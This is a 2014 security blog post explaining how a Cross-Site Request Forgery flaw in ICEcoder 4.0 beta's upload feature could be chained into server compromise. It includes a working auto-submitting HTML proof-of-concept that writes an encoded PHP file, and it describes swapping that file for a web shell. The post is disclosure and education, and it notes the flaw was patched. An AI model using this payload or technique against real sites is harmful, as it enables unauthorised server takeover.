Tuesday, September 16, 2014

From CSRF to Root Access




    In this post, I will be talking about Cross-Site Request Forgery vulnerabilities ( also known as CSRF), and how it can be used to get root access on a server. This sounds unbelievable, right ?. I will be demonstrating it in real-world web-applications.


A Quick Overview on Cross-Site Request Forgery
    “CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing.”
Source: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

    CSRF is a client-side vulnerability, which means it does not affect the server directly in normal circumstances. With CSRF bug, you are forcing the user to perform an action that he did not attended to do, some actions can differ from low to 0 risk ( such as log-out CSRF ) to high-risk actions that can compromise accounts and even the server.

Full Account Take-Over via CSRF
    This is an expected impact in under certain circumstances. So basically, if the platform does not have a CSRF protection on the settings page, the attacker can change the user's account information. Also, if a website is using a web-application that suffers from CSRF vulnerability on the password resetting or the settings, an attacker can compromise the website using this issue.

Compromising a Server via CSRF Bugs
    CSRF bugs can be found anywhere, from log-out requests, to file-uploading requests. If an attacker found a CSRF bug on the administration area, specially in uploading features, the attacker will be able to craft a malicious page that forces the victim to upload a web-shell, where an attacker can gain a root access to the server. Also, if the settings page is vulnerable to CSRF, attacks can take-over the admin's account, and then use it to upload a web-shell that will lead to compromising of the server.

Real-Life Example: ICE Coder

Overview: “ICEcoder is an open-source code editor, which provides a modern approach to building websites.”
Source: http://icecoder.net

    ICE Coder can acts like an administration panel for a website, with the capability of uploading files and modifying source code. Its latest version now is now secure by Bugcrowd security researchers, so I can suggest that you may trust it now.


ICE Coder 4.0 beta is vulnerable to many issues, including a CSRF issue in the uploading feature.

Points on the target (assuming that it exists on victim.com):
  • The folder “lib” on http://victim/icecoder/lib/ has read and write permissions.
  • There is an uploading functionality in the web-app
  • The admin can choose where to upload the file and modify it easily
  • The uploading functionality has unrestricted file-type upload ( which is normal and it should be like that)
  • The uploading functionality is vulnerable to CSRF attacks.

POC:
<html>
<title>Exploit</title>
<body onload="javascript:document.csrf_form.submit()">
<form name="csrf_form" method="POST" action="http://victim.com/icecoder/lib/file-control.php?action=save&file=/icecoder/ICEcoder-v4/lib/[NEW]">
<input type="text" id="contents" name="contents" value="&#60;&#63;&#112;&#104;&#112;&#32;&#112;&#104;&#112;&#105;&#110;&#102;&#111;&#40;&#41;&#59;&#32;&#63;&#62;"/>
<input type="text" id="newFileName" name="newFileName" value="/icecoder/lib/info.php">
</form>
</body>
</html>

    In this POC, “contents” parameter contains a PHPInfo payload that looks like:
<?php phpinfo(); ?>


    By using the POC. An attacker can force the victim to upload to a web-shell, which will cause the whole to server to be compromised.

     Fortunately, Matt Pass, the lead-developer of ICE Coder, quickly patched this issue.

Final Thoughts:
  • There is no 100% secure service, even top-profile companies face breaches from time to time. The only thing that differs a good from bad service that some companies is the duration of patching security issues in this case.
  • In this article, I have demonstrated how can a CSRF issue may lead to a compromising the whole server if it's exploited correctly.
  • I suggest that you update ICE Coder to the latest version.

    If you need any help securing your web-application or service, you can contact me by E-Mail, or Twitter.

Best Regards,
Mazin Ahmed

*Anti-Virus4You has published the article at http://blog.anti-virus4u.com/2014/09/from-csrf-to-root-access.html